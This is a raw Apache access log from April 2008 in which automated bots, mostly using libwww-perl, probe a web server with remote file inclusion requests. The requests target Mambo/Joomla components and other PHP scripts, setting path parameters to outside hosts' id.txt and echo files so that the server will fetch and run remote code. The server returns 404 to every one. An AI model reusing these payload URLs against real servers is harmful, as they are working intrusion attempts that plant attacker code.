72.29.67.38 - - [06/Apr/2008:18:32:11 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
72.29.67.38 - - [06/Apr/2008:18:32:19 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
64.34.169.20 - - [06/Apr/2008:18:33:22 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
72.29.67.38 - - [06/Apr/2008:18:33:42 -0600] "GET /index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
72.29.67.38 - - [06/Apr/2008:18:33:42 -0600] "GET /index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
64.34.169.20 - - [06/Apr/2008:18:33:46 -0600] "GET /index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
64.34.169.20 - - [06/Apr/2008:18:35:39 -0600] "GET /logs/error_log.20080203/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.65"
64.34.169.20 - - [06/Apr/2008:18:35:39 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
64.34.169.20 - - [06/Apr/2008:18:35:39 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.65"
216.246.192.39 - - [06/Apr/2008:18:36:10 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
72.29.67.38 - - [06/Apr/2008:18:36:13 -0600] "GET /logs/error_log.20080203/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.808"
72.29.67.38 - - [06/Apr/2008:18:36:13 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
72.29.67.38 - - [06/Apr/2008:18:36:13 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.808"
72.29.67.38 - - [06/Apr/2008:18:36:59 -0600] "GET /logs/error_log.20080203/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.808"
72.29.67.38 - - [06/Apr/2008:18:36:59 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
72.29.67.38 - - [06/Apr/2008:18:36:59 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.808"
64.34.169.20 - - [06/Apr/2008:18:37:41 -0600] "GET /logs/access_log.20080203/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 299 "-" "libwww-perl/5.65"
72.29.67.38 - - [06/Apr/2008:18:38:14 -0600] "GET /logs/access_log.20080203/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 299 "-" "libwww-perl/5.808"
213.173.177.11 - - [06/Apr/2008:18:38:43 -0600] "GET /logs/error_log.20080330//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 306 "-" "libwww-perl/5.76"
213.173.177.11 - - [06/Apr/2008:18:38:44 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 282 "-" "libwww-perl/5.76"
213.173.177.11 - - [06/Apr/2008:18:38:44 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 287 "-" "libwww-perl/5.76"
72.29.67.38 - - [06/Apr/2008:18:38:50 -0600] "GET /logs/access_log.20080203/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 299 "-" "libwww-perl/5.808"
85.226.60.4 - - [06/Apr/2008:18:39:03 -0600] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
216.246.192.39 - - [06/Apr/2008:18:40:01 -0600] "GET /index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
75.125.145.66 - - [06/Apr/2008:18:41:20 -0600] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
75.125.145.66 - - [06/Apr/2008:18:41:21 -0600] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
64.191.104.52 - - [06/Apr/2008:18:42:27 -0600] "GET /logs/error_log/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 281 "-" "libwww-perl/5.808"
64.191.104.52 - - [06/Apr/2008:18:42:28 -0600] "GET /logs/access_log/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 282 "-" "libwww-perl/5.808"
205.234.253.11 - - [06/Apr/2008:18:42:54 -0600] "GET /logs/access_log/main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.808"
64.34.169.20 - - [06/Apr/2008:18:43:13 -0600] "GET /logs/access_log/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
64.34.169.20 - - [06/Apr/2008:18:43:13 -0600] "GET /index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
64.34.169.20 - - [06/Apr/2008:18:43:14 -0600] "GET /logs/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
64.246.165.170 - - [06/Apr/2008:18:45:30 -0600] "GET /robots.txt HTTP/1.0" 404 204 "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)"
64.246.165.170 - - [06/Apr/2008:18:45:30 -0600] "GET / HTTP/1.1" 200 698 "http://www.whois.sc/evolutionarts.net" "SurveyBot/2.3 (Whois Source)"
72.29.67.38 - - [06/Apr/2008:18:46:26 -0600] "GET /logs/access_log/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
72.29.67.38 - - [06/Apr/2008:18:46:26 -0600] "GET /index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
72.29.67.38 - - [06/Apr/2008:18:46:26 -0600] "GET /logs/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
72.29.67.38 - - [06/Apr/2008:18:46:39 -0600] "GET /logs/access_log/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
72.29.67.38 - - [06/Apr/2008:18:46:39 -0600] "GET /index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
72.29.67.38 - - [06/Apr/2008:18:46:39 -0600] "GET /logs/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
216.246.192.39 - - [06/Apr/2008:18:47:14 -0600] "GET /logs/access_log/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
216.246.192.39 - - [06/Apr/2008:18:47:16 -0600] "GET /index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
216.246.192.39 - - [06/Apr/2008:18:47:16 -0600] "GET /logs/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
200.139.131.212 - - [06/Apr/2008:18:47:44 -0600] "GET /logs/error_log.20080203//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 299 "-" "libwww-perl/5.808"
200.139.131.212 - - [06/Apr/2008:18:47:44 -0600] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
200.139.131.212 - - [06/Apr/2008:18:47:45 -0600] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.808"
216.246.192.39 - - [06/Apr/2008:18:48:32 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.808"
216.246.192.39 - - [06/Apr/2008:18:48:32 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
218.216.120.163 - - [06/Apr/2008:18:48:56 -0600] "GET /logs/error_log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
218.216.120.163 - - [06/Apr/2008:18:48:56 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
218.216.120.163 - - [06/Apr/2008:18:48:57 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
62.75.141.104 - - [06/Apr/2008:18:49:03 -0600] "GET /logs/access_log/akocomments.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
62.75.141.104 - - [06/Apr/2008:18:49:03 -0600] "GET /akocomments.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
62.75.141.104 - - [06/Apr/2008:18:49:04 -0600] "GET /logs/akocomments.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 238 "-" "libwww-perl/5.65"
216.246.192.39 - - [06/Apr/2008:18:49:11 -0600] "GET /logs/error_log.20080203/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.808"
216.246.192.39 - - [06/Apr/2008:18:49:11 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
216.246.192.39 - - [06/Apr/2008:18:49:12 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.808"
62.75.141.104 - - [06/Apr/2008:18:49:45 -0600] "GET /logs/error_log/akocomments.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
85.226.60.4 - - [06/Apr/2008:18:50:16 -0600] "GET /logs/error_log.20080330//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.805"
85.226.60.4 - - [06/Apr/2008:18:50:17 -0600] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
85.226.60.4 - - [06/Apr/2008:18:50:18 -0600] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
216.246.192.39 - - [06/Apr/2008:18:52:16 -0600] "GET /logs/access_log.20080203/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 299 "-" "libwww-perl/5.808"
200.139.131.212 - - [06/Apr/2008:18:52:48 -0600] "GET /logs/error_log.20080203//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 299 "-" "libwww-perl/5.808"
200.139.131.212 - - [06/Apr/2008:18:52:48 -0600] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
200.139.131.212 - - [06/Apr/2008:18:52:49 -0600] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.808"
200.139.131.212 - - [06/Apr/2008:18:53:06 -0600] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.808"
200.139.131.212 - - [06/Apr/2008:18:53:07 -0600] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
204.11.238.233 - - [06/Apr/2008:18:53:45 -0600] "GET /logs/error_log/akocomments.php?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
204.11.238.233 - - [06/Apr/2008:18:53:45 -0600] "GET /akocomments.php?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
204.11.238.233 - - [06/Apr/2008:18:53:45 -0600] "GET /logs/akocomments.php?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.808"
74.220.215.233 - - [06/Apr/2008:18:54:01 -0600] "GET /logs/access_log.20080127/template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.808"
74.220.215.233 - - [06/Apr/2008:18:54:01 -0600] "GET /template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.808"
74.220.215.233 - - [06/Apr/2008:18:54:01 -0600] "GET /logs/template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
200.139.131.212 - - [06/Apr/2008:18:54:03 -0600] "GET /logs/access_log.20080203//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
74.220.215.233 - - [06/Apr/2008:18:56:31 -0600] "GET /logs/access_log/template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
212.227.65.191 - - [06/Apr/2008:18:56:54 -0600] "GET /logs/!scanftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
212.227.65.191 - - [06/Apr/2008:18:56:54 -0600] "GET /!scanftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
212.227.65.191 - - [06/Apr/2008:18:56:55 -0600] "GET /logs/!scanftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
212.227.65.191 - - [06/Apr/2008:18:56:55 -0600] "GET /!scanftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
204.11.238.233 - - [06/Apr/2008:18:57:10 -0600] "GET /logs/access_log/akocomments.php?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
200.139.131.212 - - [06/Apr/2008:18:58:07 -0600] "GET /logs/access_log.20080203//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
80.67.24.32 - - [06/Apr/2008:18:58:39 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
83.68.228.146 - - [06/Apr/2008:18:59:30 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
72.18.192.224 - - [06/Apr/2008:18:59:46 -0600] "GET /logs/access_log.20080120/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
72.18.192.224 - - [06/Apr/2008:18:59:46 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
72.18.192.224 - - [06/Apr/2008:18:59:46 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
80.67.24.32 - - [06/Apr/2008:18:59:47 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
212.227.65.191 - - [06/Apr/2008:19:01:20 -0600] "GET /logs/!scanftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
212.227.65.191 - - [06/Apr/2008:19:01:20 -0600] "GET /!scanftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
72.18.192.224 - - [06/Apr/2008:19:01:52 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
64.191.104.52 - - [06/Apr/2008:19:02:01 -0600] "GET /index.php?option=com_jcs&task=add&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 227 "-" "libwww-perl/5.808"
213.215.80.102 - - [06/Apr/2008:19:03:08 -0600] "GET /logs/access_log.20080203/!scanftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
213.215.80.102 - - [06/Apr/2008:19:03:08 -0600] "GET /!scanftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
213.215.80.102 - - [06/Apr/2008:19:03:09 -0600] "GET /logs/!scanftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
213.215.80.102 - - [06/Apr/2008:19:03:15 -0600] "GET /logs/access_log/!scanftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
208.179.229.229 - - [06/Apr/2008:19:08:55 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 238 "-" "libwww-perl/5.65"
208.179.229.229 - - [06/Apr/2008:19:08:55 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 238 "-" "libwww-perl/5.65"
208.179.229.229 - - [06/Apr/2008:19:08:56 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
208.179.229.229 - - [06/Apr/2008:19:08:56 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://199k.info/krix/sistem.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.65"
208.179.229.229 - - [06/Apr/2008:19:08:56 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
208.179.229.229 - - [06/Apr/2008:19:08:56 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://199k.info/krix/sistem.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
81.169.176.162 - - [06/Apr/2008:19:10:54 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
81.169.176.162 - - [06/Apr/2008:19:10:54 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
72.18.192.224 - - [06/Apr/2008:19:11:09 -0600] "GET /logs/access_log.20080203/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
213.215.80.102 - - [06/Apr/2008:19:14:46 -0600] "GET /logs/error_log.20080330/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
213.215.80.102 - - [06/Apr/2008:19:14:46 -0600] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
213.215.80.102 - - [06/Apr/2008:19:14:46 -0600] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
207.58.135.90 - - [06/Apr/2008:19:15:02 -0600] "GET /main.php?x=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
207.58.135.90 - - [06/Apr/2008:19:15:02 -0600] "GET /logs/main.php?x=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
64.191.104.52 - - [06/Apr/2008:19:15:09 -0600] "GET /logs/error_log.20080127/index.php?option=com_jcs&task=add&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 239 "-" "libwww-perl/5.808"
64.191.104.52 - - [06/Apr/2008:19:15:09 -0600] "GET /logs/index.php?option=com_jcs&task=add&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
64.191.104.52 - - [06/Apr/2008:19:15:13 -0600] "GET /logs/access_log.20080127/index.php?option=com_jcs&task=add&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 240 "-" "libwww-perl/5.808"
87.238.162.240 - - [06/Apr/2008:19:16:47 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
87.238.162.240 - - [06/Apr/2008:19:16:47 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
72.5.54.87 - - [06/Apr/2008:19:16:51 -0600] "GET /logs/access_log.20080120//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 273 "-" "libwww-perl/5.65"
72.5.54.87 - - [06/Apr/2008:19:16:51 -0600] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 248 "-" "libwww-perl/5.65"
